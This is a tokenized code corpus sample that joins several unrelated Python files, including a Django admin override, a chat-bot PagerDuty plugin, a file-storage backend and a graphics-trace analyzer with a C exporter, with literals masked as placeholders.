oneofs = [ <EOL> ] , <EOL> serialized_start = <NUM_LIT> , <EOL> serialized_end = <NUM_LIT> , <EOL> ) <EOL> DESCRIPTOR . message_types_by_name [ '<STR_LIT>' ] = _IMPORTNOARENANESTEDMESSAGE <EOL> ImportNoArenaNestedMessage = _reflection . GeneratedProtocolMessageType ( '<STR_LIT>' , ( _message . Message , ) , dict ( <EOL> DESCRIPTOR = _IMPORTNOARENANESTEDMESSAGE , <EOL> __module__ = '<STR_LIT>' <EOL> ) ) <EOL> _sym_db . RegisterMessage ( ImportNoArenaNestedMessage ) </s>
<s> from django . contrib import admin <EOL> from django . contrib . auth . admin import UserAdmin <EOL> from django . contrib . auth . models import User <EOL> from longerusername . forms import UserCreationForm , UserChangeForm <EOL> class LongerUserNameUserAdmin ( UserAdmin ) : <EOL> add_form = UserCreationForm <EOL> form = UserChangeForm <EOL> admin . site . unregister ( User ) <EOL> admin . site . register ( User , LongerUserNameUserAdmin ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> from django_seo_js import VERSION <EOL> ROOT_DIR = os . path . dirname ( __file__ ) <EOL> SOURCE_DIR = os . path . join ( ROOT_DIR ) <EOL> reqs = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT>" ) as f : <EOL> for line in f . readlines ( ) : <EOL> reqs . append ( line . strip ( ) ) <EOL> test_reqs = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT>" ) as f : <EOL> for line in f . readlines ( ) : <EOL> test_reqs . append ( line . strip ( ) ) <EOL> try : <EOL> import pypandoc <EOL> long_description = pypandoc . convert ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> except ( IOError , ImportError ) : <EOL> long_description = '<STR_LIT>' <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> description = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> version = VERSION , <EOL> download_url = [ <EOL> '<STR_LIT>' <EOL> % VERSION , <EOL> ] , <EOL> install_requires = reqs , <EOL> tests_require = test_reqs , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> keywords = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> from errors import ErrorMixin <EOL> from email import EmailMixin <EOL> from hipchat import HipChatMixin <EOL> from naturaltime import NaturalTimeMixin <EOL> from room import RoomMixin <EOL> from roster import RosterMixin <EOL> from plugins_library import PluginModulesLibraryMixin <EOL> from schedule import ScheduleMixin <EOL> from settings import SettingsMixin <EOL> from storage import StorageMixin </s>
<s> from will . plugin import WillPlugin <EOL> from will . decorators import respond_to , require_settings <EOL> from will import settings <EOL> import datetime <EOL> import pygerduty <EOL> class PagerDutyPlugin ( WillPlugin ) : <EOL> @ staticmethod <EOL> def _associate_pd_user ( email_address , pager ) : <EOL> try : <EOL> user = next ( pager . users . list ( query = email_address , limit = <NUM_LIT:1> ) ) <EOL> return user <EOL> except StopIteration : <EOL> return None <EOL> def _get_user_email_from_mention_name ( self , mention_name ) : <EOL> try : <EOL> u = self . get_user_by_nick ( mention_name [ <NUM_LIT:1> : ] ) <EOL> email_address = self . get_hipchat_user ( u [ '<STR_LIT>' ] ) [ '<STR_LIT:email>' ] <EOL> return email_address <EOL> except TypeError : <EOL> return None <EOL> def _update_incident ( self , message , incidents , action , assign_to_email = None ) : <EOL> pager = pygerduty . PagerDuty ( settings . PAGERDUTY_SUBDOMAIN , settings . PAGERDUTY_API_KEY ) <EOL> email_address = self . get_hipchat_user ( message . sender [ '<STR_LIT>' ] ) [ '<STR_LIT:email>' ] <EOL> user = self . _associate_pd_user ( email_address , pager ) <EOL> if user is None : <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> return <EOL> if incidents : <EOL> for i in incidents : <EOL> try : <EOL> incident = pager . incidents . show ( entity_id = i ) <EOL> except pygerduty . BadRequest as e : <EOL> if e . code == <NUM_LIT> : <EOL> self . reply ( message , "<STR_LIT>" % i , color = "<STR_LIT>" ) <EOL> continue <EOL> if action == '<STR_LIT>' : <EOL> try : <EOL> incident . acknowledge ( requester_id = user . id ) <EOL> except pygerduty . BadRequest as e : <EOL> if e . code == <NUM_LIT> : <EOL> self . reply ( message , "<STR_LIT>" % i , color = "<STR_LIT>" ) <EOL> continue <EOL> elif action == '<STR_LIT>' : <EOL> try : <EOL> incident . resolve ( requester_id = user . id ) <EOL> except pygerduty . BadRequest as e : <EOL> if e . code == <NUM_LIT> : <EOL> self . reply ( message , "<STR_LIT>" % i , color = "<STR_LIT>" ) <EOL> continue <EOL> elif action == '<STR_LIT>' : <EOL> try : <EOL> if assign_to_email is not None : <EOL> assign_to = self . _associate_pd_user ( assign_to_email , pager ) <EOL> if assign_to is None : <EOL> self . reply ( message , "<STR_LIT>" % assign_to_email ) <EOL> return <EOL> else : <EOL> incident . reassign ( user_ids = [ assign_to . id ] , requester_id = user . id ) <EOL> except pygerduty . BadRequest : <EOL> continue <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> if action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' , assigned_to = user ) : <EOL> incident . acknowledge ( requester_id = user . id ) <EOL> elif action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' ) : <EOL> incident . acknowledge ( requester_id = user . id ) <EOL> elif action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' , assigned_to = user ) : <EOL> incident . resolve ( requester_id = user . id ) <EOL> elif action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' ) : <EOL> incident . resolve ( requester_id = user . id ) <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> except pygerduty . BadRequest : <EOL> pass <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def ack_all_assigned_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def ack_incidents ( self , message , incidents ) : <EOL> self . _update_incident ( message , incidents . split ( "<STR_LIT:U+0020>" ) , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def ack_all_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def resolve_all_assigned_and_acknowledged_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def resolve_incidens ( self , message , incidents ) : <EOL> self . _update_incident ( message , incidents . split ( "<STR_LIT:U+0020>" ) , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def resolve_all_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def set_service_maintenance ( self , message , service_name = None , interval = None ) : <EOL> if not interval : <EOL> interval = <NUM_LIT:1> <EOL> pager = pygerduty . PagerDuty ( settings . PAGERDUTY_SUBDOMAIN , settings . PAGERDUTY_API_KEY ) <EOL> for service in pager . services . list ( limit = <NUM_LIT:50> ) : <EOL> if service . name == service_name : <EOL> user = self . _associate_pd_user ( self . get_hipchat_user ( message . sender [ '<STR_LIT>' ] ) [ '<STR_LIT:email>' ] , pager ) <EOL> if user is None : <EOL> self . reply ( message , "<STR_LIT>" , color = "<STR_LIT>" ) <EOL> return <EOL> now = datetime . datetime . utcnow ( ) <EOL> start_time = now . strftime ( "<STR_LIT>" ) <EOL> end_time = ( now + datetime . timedelta ( hours = int ( interval ) ) ) . strftime ( "<STR_LIT>" ) <EOL> try : <EOL> pager . maintenance_windows . create ( service_ids = service . id , requester_id = user . id , <EOL> start_time = start_time , <EOL> end_time = end_time ) <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> except pygerduty . BadRequest as e : <EOL> self . reply ( message , "<STR_LIT>" % e . message , color = "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def reassign_incidents ( self , message , incidents , mention_name ) : <EOL> email_address = self . _get_user_email_from_mention_name ( mention_name ) <EOL> if email_address : <EOL> self . _update_incident ( message , incidents . split ( "<STR_LIT:U+0020>" ) , '<STR_LIT>' , email_address ) <EOL> else : <EOL> self . reply ( message , "<STR_LIT>" % mention_name ) </s>
<s> import logging <EOL> import os <EOL> import time <EOL> from will . utils import sizeof_fmt <EOL> class FileStorageException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileStorage ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , settings ) : <EOL> self . dirname = os . path . abspath ( os . path . expanduser ( settings . FILE_DIR ) ) <EOL> self . dotfile = os . path . join ( self . dirname , "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" , self . dirname ) <EOL> if not os . path . exists ( self . dirname ) : <EOL> os . makedirs ( self . dirname , mode = <NUM_LIT:0> <NUM_LIT> ) <EOL> elif not os . path . exists ( self . dotfile ) : <EOL> if len ( self . _all_setting_files ( ) ) > <NUM_LIT:0> : <EOL> raise FileStorageException ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( self . dirname , ) ) <EOL> os . chmod ( self . dirname , <NUM_LIT:0> <NUM_LIT> ) <EOL> with open ( self . dotfile , '<STR_LIT:a>' ) : <EOL> os . utime ( self . dotfile , None ) <EOL> def _all_setting_files ( self ) : <EOL> return [ <EOL> os . path . join ( self . dirname , f ) <EOL> for f in os . listdir ( self . dirname ) <EOL> if os . path . isfile ( os . path . join ( self . dirname , f ) ) <EOL> ] <EOL> def _key_paths ( self , key ) : <EOL> key_path = os . path . join ( self . dirname , key ) <EOL> expire_path = os . path . join ( self . dirname , '<STR_LIT:.>' + key + '<STR_LIT>' ) <EOL> return key_path , expire_path <EOL> def save ( self , key , value , expire = None ) : <EOL> key_path , expire_path = self . _key_paths ( key ) <EOL> with open ( key_path , '<STR_LIT:w>' ) as f : <EOL> f . write ( value ) <EOL> if expire is not None : <EOL> with open ( expire_path , '<STR_LIT:w>' ) as f : <EOL> f . write ( expire ) <EOL> elif os . path . exists ( expire_path ) : <EOL> os . unlink ( expire_path ) <EOL> def clear ( self , key ) : <EOL> key_path , expire_path = self . _key_paths ( key ) <EOL> if os . path . exists ( key_path ) : <EOL> os . unlink ( key_path ) <EOL> if os . path . exists ( expire_path ) : <EOL> os . unlink ( expire_path ) <EOL> def clear_all_keys ( self ) : <EOL> for filename in self . _all_setting_files ( ) : <EOL> os . unlink ( filename ) <EOL> def load ( self , key ) : <EOL> key_path , expire_path = self . _key_paths ( key ) <EOL> if os . path . exists ( expire_path ) : <EOL> with open ( expire_path , '<STR_LIT:r>' ) as f : <EOL> expire_at = f . read ( ) <EOL> if time . time ( ) > int ( expire_at ) : <EOL> self . clear ( key ) <EOL> return <EOL> if os . path . exists ( key_path ) : <EOL> with open ( key_path , '<STR_LIT:r>' ) as f : <EOL> return f . read ( ) <EOL> def size ( self ) : <EOL> return sizeof_fmt ( sum ( [ <EOL> os . path . getsize ( filename ) <EOL> for filename in self . _all_setting_files ( ) <EOL> ] ) ) <EOL> def bootstrap ( settings ) : <EOL> return FileStorage ( settings ) </s>
<s> from django . http import HttpResponse <EOL> from django . utils . encoding import iri_to_uri <EOL> class HttpResponseReload ( HttpResponse ) : <EOL> """<STR_LIT>""" <EOL> status_code = <NUM_LIT> <EOL> def __init__ ( self , request ) : <EOL> HttpResponse . __init__ ( self ) <EOL> referer = request . META . get ( '<STR_LIT>' ) <EOL> self [ '<STR_LIT>' ] = iri_to_uri ( referer or "<STR_LIT:/>" ) </s>
<s> import sublime <EOL> import sys <EOL> VERSION = int ( sublime . version ( ) ) <EOL> reloader = "<STR_LIT>" <EOL> if VERSION > <NUM_LIT> : <EOL> reloader = '<STR_LIT>' + reloader <EOL> from imp import reload <EOL> if reloader in sys . modules : <EOL> reload ( sys . modules [ reloader ] ) <EOL> if VERSION > <NUM_LIT> : <EOL> from . persistent_regex_highlight import reloader <EOL> from . persistent_regex_highlight . persistent_regex_highlight import * <EOL> else : <EOL> from persistent_regex_highlight import reloader <EOL> from persistent_regex_highlight . persistent_regex_highlight import * </s>
<s> """<STR_LIT>""" <EOL> __title__ = '<STR_LIT>' <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> from . tcptest import tcp_test <EOL> from . colours import Colours <EOL> from . colours import COLOURS <EOL> from . charcoal import Charcoal <EOL> from . get_verify import get_verify <EOL> from . get_host_overrides import get_host_overrides <EOL> from . output import Output <EOL> __all__ = [ '<STR_LIT:.>' ] </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import traceback <EOL> import inspect <EOL> import BinaryCodec <EOL> import Trace <EOL> import TraceOperations <EOL> import Plugin <EOL> import Common <EOL> from common import Task <EOL> from common import Log <EOL> from common import Project <EOL> from common import Console <EOL> from common import pyparsing <EOL> try : <EOL> import readline <EOL> except ImportError : <EOL> pass <EOL> try : <EOL> import psyco <EOL> psyco . full ( ) <EOL> except : <EOL> pass <EOL> try : <EOL> import hotshot , hotshot . stats <EOL> except : <EOL> hotshot = None <EOL> pass <EOL> def getFunctionArguments ( func ) : <EOL> availableArgs , _ , _ , _ = inspect . getargspec ( func ) <EOL> return availableArgs <EOL> def completeKeywordArguments ( func , args ) : <EOL> kwargs = { } <EOL> availableArgs = getFunctionArguments ( func ) <EOL> for arg , value in args . items ( ) : <EOL> if not arg in availableArgs : <EOL> for availableArg in reversed ( availableArgs ) : <EOL> if availableArg . lower ( ) . startswith ( arg ) : <EOL> arg = availableArg <EOL> break <EOL> kwargs [ arg ] = value <EOL> return kwargs <EOL> class ExecutionError ( Exception ) : <EOL> pass <EOL> class Analyzer ( object ) : <EOL> def __init__ ( self , project ) : <EOL> self . project = project <EOL> self . traces = { } <EOL> self . importPlugins = [ ] <EOL> self . exportPlugins = [ ] <EOL> def reportInfo ( self , msg ) : <EOL> pass <EOL> def reportWarning ( self , msg ) : <EOL> pass <EOL> def reportError ( self , msg ) : <EOL> pass <EOL> def reportDebug ( self , msg ) : <EOL> pass <EOL> class ScriptParser ( object ) : <EOL> def __init__ ( self ) : <EOL> p = pyparsing <EOL> p . ParserElement . setDefaultWhitespaceChars ( "<STR_LIT>" ) <EOL> self . commandName = p . Word ( p . alphas , p . alphanums + "<STR_LIT:->" ) <EOL> self . argName = p . Word ( p . alphas , p . alphanums + "<STR_LIT:->" ) <EOL> self . argValue = p . Word ( p . alphanums + "<STR_LIT>" ) | p . QuotedString ( '<STR_LIT:">' , escChar = "<STR_LIT:\\>" ) <EOL> self . commandArg = p . Group ( p . Optional ( self . argName + p . Suppress ( "<STR_LIT:=>" ) , default = None ) + self . argValue ) <EOL> self . command = p . Optional ( <EOL> p . Group ( p . Literal ( "<STR_LIT>" ) + p . SkipTo ( p . lineEnd | p . Literal ( "<STR_LIT:;>" ) ) ) | <EOL> p . Group ( self . commandName + p . Optional ( p . Group ( p . ZeroOrMore ( self . commandArg ) ) , default = [ ] ) ) <EOL> ) <EOL> self . commandList = p . delimitedList ( self . command , "<STR_LIT:;>" ) <EOL> self . script = p . delimitedList ( self . commandList , "<STR_LIT:\n>" ) <EOL> def parse ( self , script ) : <EOL> try : <EOL> return self . script . parseString ( script ) <EOL> except pyparsing . ParseException : <EOL> return [ ] <EOL> class InteractiveAnalyzer ( Analyzer , Task . TaskMonitor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , project , options ) : <EOL> Analyzer . __init__ ( self , project ) <EOL> self . commands = { } <EOL> self . commandHelp = { } <EOL> self . options = options <EOL> self . parser = ScriptParser ( ) <EOL> self . done = False <EOL> self . colorizer = Console . colorizer <EOL> self . taskMonitor = Task . RateLimitedTaskMonitor ( self ) <EOL> self . profiling = False <EOL> self . plugins = [ ] <EOL> self . traceFiles = { } <EOL> self . customSyntaxCommands = set ( ) <EOL> if not self . project . targets : <EOL> Log . warn ( "<STR_LIT>" ) <EOL> if not self . projectHasApiDescription ( ) : <EOL> Log . warn ( "<STR_LIT>" ) <EOL> self . registerCommand ( "<STR_LIT>" , self . quit ) <EOL> Task . setMonitor ( self . taskMonitor ) <EOL> self . _loadPlugins ( ) <EOL> def _loadPlugins ( self ) : <EOL> self . importPlugins = [ ] <EOL> self . exportPlugins = [ ] <EOL> self . plugins = [ ] <EOL> def loadPlugins ( pluginModule , collection , loader ) : <EOL> plugins = loader ( self , pluginModule ) <EOL> if self . options . verbose : <EOL> for p in plugins : <EOL> self . reportDebug ( "<STR_LIT>" % p ) <EOL> collection . extend ( plugins ) <EOL> for plugin in Plugin . getAvailablePluginModules ( ) : <EOL> loadPlugins ( plugin , self . plugins , Plugin . loadInteractivePlugins ) <EOL> loadPlugins ( plugin , self . importPlugins , Plugin . loadImporterPlugins ) <EOL> loadPlugins ( plugin , self . exportPlugins , Plugin . loadExporterPlugins ) <EOL> def projectHasApiDescription ( self ) : <EOL> if not self . project or not "<STR_LIT:code>" in self . project . targets : <EOL> return False <EOL> return True <EOL> def reportInfo ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . notice ( line ) <EOL> def reportWarning ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . warn ( line ) <EOL> def reportError ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . error ( line ) <EOL> def reportDebug ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . debug ( line ) <EOL> def fail ( self , message , showException = False ) : <EOL> if showException and sys . exc_info ( ) : <EOL> self . reportDebug ( "<STR_LIT>" . join ( traceback . format_exception ( * sys . exc_info ( ) ) ) ) <EOL> self . reportError ( message ) <EOL> raise ExecutionError ( message ) <EOL> def registerCommand ( self , command , function , helpFunction = None , customSyntax = False ) : <EOL> self . commands [ command ] = function <EOL> self . commandHelp [ command ] = helpFunction <EOL> if customSyntax : <EOL> self . customSyntaxCommands . add ( command ) <EOL> def taskStarted ( self , task ) : <EOL> pass <EOL> def taskProgress ( self , task ) : <EOL> Console . printProgressBar ( task , self . colorizer ) <EOL> def taskFinished ( self , task ) : <EOL> Console . eraseProgressBar ( ) <EOL> def parseEventRange ( self , trace , eventRange ) : <EOL> """<STR_LIT>""" <EOL> if not eventRange : <EOL> return ( <NUM_LIT:0> , len ( trace . events ) ) <EOL> def parse ( number , base = <NUM_LIT:0> , default = <NUM_LIT:0> ) : <EOL> if not number : <EOL> return default <EOL> if number [ <NUM_LIT:0> ] == '<STR_LIT:+>' : <EOL> offset = base <EOL> number = number [ <NUM_LIT:1> : ] <EOL> else : <EOL> offset = <NUM_LIT:0> <EOL> try : <EOL> return int ( number ) + offset <EOL> except ValueError : <EOL> assert number [ <NUM_LIT:0> ] == "<STR_LIT:#>" <EOL> targetFrameNumber = int ( number [ <NUM_LIT:1> : ] ) <EOL> frameNumber = <NUM_LIT:0> <EOL> if targetFrameNumber < <NUM_LIT:0> : <EOL> frames = len ( [ e for e in trace . events if self . lookupFunction ( e ) . isFrameMarker ] ) <EOL> targetFrameNumber += frames <EOL> i = <NUM_LIT:0> <EOL> for i , event in enumerate ( trace . events [ offset : ] ) : <EOL> if frameNumber == targetFrameNumber : <EOL> break <EOL> if self . lookupFunction ( event ) . isFrameMarker : <EOL> frameNumber += <NUM_LIT:1> <EOL> return i + offset <EOL> try : <EOL> first , last = eventRange . split ( "<STR_LIT::>" ) <EOL> except ValueError : <EOL> first , last = eventRange , eventRange <EOL> first = parse ( first ) <EOL> last = parse ( last , first , len ( trace . events ) ) <EOL> if first == last : last += <NUM_LIT:1> <EOL> return ( first , last ) <EOL> def parseBoolean ( self , boolean ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return bool ( int ( boolean ) ) <EOL> except ValueError : <EOL> if boolean . lower ( ) in [ "<STR_LIT:yes>" , "<STR_LIT>" , "<STR_LIT:true>" , "<STR_LIT>" ] : <EOL> return True <EOL> return False <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> self . done = True <EOL> def lookupFunction ( self , event ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> library = self . project . targets [ "<STR_LIT:code>" ] . library <EOL> except KeyError : <EOL> return <EOL> if event . name in library . functions : <EOL> return library . functions [ event . name ] <EOL> def completeCommand ( self , command ) : <EOL> if command not in self . commands : <EOL> parts = command . split ( "<STR_LIT:->" ) <EOL> for fullCommand in sorted ( self . commands . keys ( ) ) : <EOL> fullParts = fullCommand . split ( "<STR_LIT:->" ) <EOL> if not len ( fullParts ) == len ( parts ) : <EOL> continue <EOL> for p1 , p2 in zip ( fullParts , parts ) : <EOL> if not p1 . startswith ( p2 ) : <EOL> break <EOL> else : <EOL> command = fullCommand <EOL> break <EOL> return command <EOL> def execute ( self , script ) : <EOL> commands = self . parser . parse ( script ) <EOL> if not commands : <EOL> self . fail ( "<STR_LIT>" ) <EOL> for command , commandArgs in commands : <EOL> command = self . completeCommand ( command ) <EOL> if command not in self . commands : <EOL> self . fail ( "<STR_LIT>" ) <EOL> if command not in self . customSyntaxCommands : <EOL> args = [ ] <EOL> kwargs = { } <EOL> for arg , value in commandArgs : <EOL> if arg is None : <EOL> args . append ( value ) <EOL> else : <EOL> kwargs [ arg ] = value <EOL> kwargs = completeKeywordArguments ( self . commands [ command ] , kwargs ) <EOL> else : <EOL> args = [ commandArgs ] <EOL> kwargs = { } <EOL> if self . profiling and hotshot : <EOL> prof = hotshot . Profile ( "<STR_LIT>" ) <EOL> else : <EOL> prof = None <EOL> try : <EOL> if prof : <EOL> prof . runcall ( self . commands [ command ] , * args , ** kwargs ) <EOL> else : <EOL> self . commands [ command ] ( * args , ** kwargs ) <EOL> except Exception , e : <EOL> self . fail ( e , showException = True ) <EOL> if prof : <EOL> prof . close ( ) <EOL> stats = hotshot . stats . load ( "<STR_LIT>" ) <EOL> stats . sort_stats ( "<STR_LIT:time>" , "<STR_LIT>" ) <EOL> stats . print_stats ( <NUM_LIT:20> ) <EOL> def run ( self ) : <EOL> while not self . done : <EOL> try : <EOL> self . colorizer . setColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> try : <EOL> sys . stdout . write ( "<STR_LIT>" % self . project . config . name ) <EOL> except AttributeError : <EOL> sys . stdout . write ( "<STR_LIT>" % "<STR_LIT>" ) <EOL> self . colorizer . resetColor ( ) <EOL> command = raw_input ( ) <EOL> except KeyboardInterrupt : <EOL> break <EOL> except EOFError : <EOL> break <EOL> if not command : <EOL> continue <EOL> try : <EOL> self . execute ( command ) <EOL> except ExecutionError : <EOL> pass <EOL> except KeyboardInterrupt : <EOL> print <EOL> self . reportError ( "<STR_LIT>" ) <EOL> def reload ( self ) : <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( sys . modules ) ) <EOL> for plugin in self . plugins : <EOL> reload ( sys . modules [ plugin . __module__ ] ) </s>
<s> import re <EOL> import Plugin <EOL> from common import Task <EOL> import Trace <EOL> import Common <EOL> import StringUtils <EOL> import time <EOL> from common import OrderedDict <EOL> from common import Library <EOL> from common . Collections import DefaultDict <EOL> arrayTypeMap = { <EOL> Trace . ByteArrayValue : "<STR_LIT>" , <EOL> Trace . ShortArrayValue : "<STR_LIT>" , <EOL> Trace . IntegerArrayValue : "<STR_LIT:int>" , <EOL> Trace . LongArrayValue : "<STR_LIT>" , <EOL> Trace . FloatArrayValue : "<STR_LIT:float>" , <EOL> Trace . DoubleArrayValue : "<STR_LIT>" , <EOL> } <EOL> copyrightText = "<STR_LIT>" <EOL> class CSourceExporterPlugin ( Plugin . ExporterPlugin ) : <EOL> """<STR_LIT>""" <EOL> formatName = "<STR_LIT:c>" <EOL> def saveTrace ( self , trace , traceFile , <EOL> dataFileName = None , <EOL> dataFileFormat = "<STR_LIT>" , <EOL> frameMarkers = [ ] , <EOL> initFuncName = "<STR_LIT>" , <EOL> uninitFuncName = "<STR_LIT>" , <EOL> playFuncName = "<STR_LIT>" , <EOL> playFrameFuncName = "<STR_LIT>" , <EOL> frameFuncName = "<STR_LIT>" , <EOL> arrayPrefix = "<STR_LIT>" , <EOL> playerArgument = "<STR_LIT>" , <EOL> insertCopyright = True ) : <EOL> try : <EOL> library = self . analyzer . project . targets [ "<STR_LIT:code>" ] . library <EOL> config = self . analyzer . project . config <EOL> except ( AttributeError , KeyError ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> def arrayId ( array ) : <EOL> assert isinstance ( array , Trace . Array ) <EOL> return ( array . __class__ , array . id ) <EOL> def objectId ( obj ) : <EOL> assert isinstance ( obj , Trace . Object ) <EOL> return "<STR_LIT>" % ( obj . cls . name . lower ( ) , obj . ns , obj . id ) <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( trace . events ) ) <EOL> indent = "<STR_LIT:U+0020>" * <NUM_LIT:3> <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( trace . events ) ) <EOL> values = [ ] <EOL> [ values . extend ( e . values . values ( ) ) for e in trace . events ] <EOL> arrays = OrderedDict ( [ ( arrayId ( v ) , v ) for v in reversed ( values ) if isinstance ( v , Trace . Array ) ] ) <EOL> if dataFileName : <EOL> assert dataFileName . endswith ( "<STR_LIT>" ) , "<STR_LIT>" <EOL> assert dataFileFormat in ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" <EOL> dataFile = open ( dataFileName , "<STR_LIT:w>" ) <EOL> else : <EOL> dataFile = None <EOL> arraySizes = dict ( [ ( a , <NUM_LIT:0> ) for a in arrays . keys ( ) ] ) <EOL> for value in values : <EOL> if isinstance ( value , Trace . Array ) : <EOL> a = arrayId ( value ) <EOL> arraySizes [ a ] = max ( len ( value ) , arraySizes [ a ] ) <EOL> classes = { } <EOL> objectTypes = { } <EOL> arrayTypes = { } <EOL> outValueObjects = set ( ) <EOL> arrayVariants = DefaultDict ( list ) <EOL> usePersistentArrays = False <EOL> def registerObject ( event , name , value ) : <EOL> if not value . cls in classes : <EOL> classes [ value . cls ] = { } <EOL> function = self . analyzer . lookupFunction ( event ) <EOL> if not name or function . parameters [ name ] . isOut : <EOL> outValueObjects . add ( value ) <EOL> if objectId ( value ) in classes [ value . cls ] : <EOL> return <EOL> classes [ value . cls ] [ objectId ( value ) ] = value <EOL> for cType , nativeTypeName in library . typeMap . items ( ) : <EOL> if cType . name == value . cls . name : <EOL> objectTypes [ value ] = cType <EOL> break <EOL> else : <EOL> self . analyzer . reportWarning ( "<STR_LIT>" % value . cls . name ) <EOL> objectTypes [ value ] = value . cls . name <EOL> def registerArray ( event , name , value ) : <EOL> function = self . analyzer . lookupFunction ( event ) <EOL> if name : <EOL> cType = function . parameters [ name ] . type <EOL> else : <EOL> cType = function . type <EOL> cType = Library . Type ( cType . name ) <EOL> realType = library . resolveType ( cType ) <EOL> if realType . name == "<STR_LIT>" : <EOL> cType = arrayTypeMap [ value . __class__ ] <EOL> arrayTypes [ arrayId ( value ) ] = cType <EOL> if isinstance ( value , Trace . ObjectArrayValue ) : <EOL> for obj in value : <EOL> registerObject ( event , name , obj ) <EOL> for event in trace . events : <EOL> if event . name . startswith ( "<STR_LIT>" ) : <EOL> usePersistentArrays = True <EOL> for name , value in event . values . items ( ) : <EOL> if isinstance ( value , Trace . Object ) : <EOL> registerObject ( event , name , value ) <EOL> elif isinstance ( value , Trace . Array ) : <EOL> registerArray ( event , name , value ) <EOL> for array in event . modifiedArrays : <EOL> a = arrayId ( array ) <EOL> if a in arrayTypes : <EOL> arrayVariants [ a ] . append ( array ) <EOL> task . step ( ) <EOL> if frameMarkers : <EOL> frameCount = len ( frameMarkers ) + <NUM_LIT:3> <EOL> else : <EOL> frameCount = len ( [ <NUM_LIT:1> for event in trace . events if self . analyzer . lookupFunction ( event ) . isFrameMarker ] ) + <NUM_LIT:3> <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( len ( trace . events ) , frameCount ) <EOL> if insertCopyright : <EOL> print >> traceFile , copyrightText <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT>" <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" <EOL> print >> traceFile , indent * <NUM_LIT:2> , 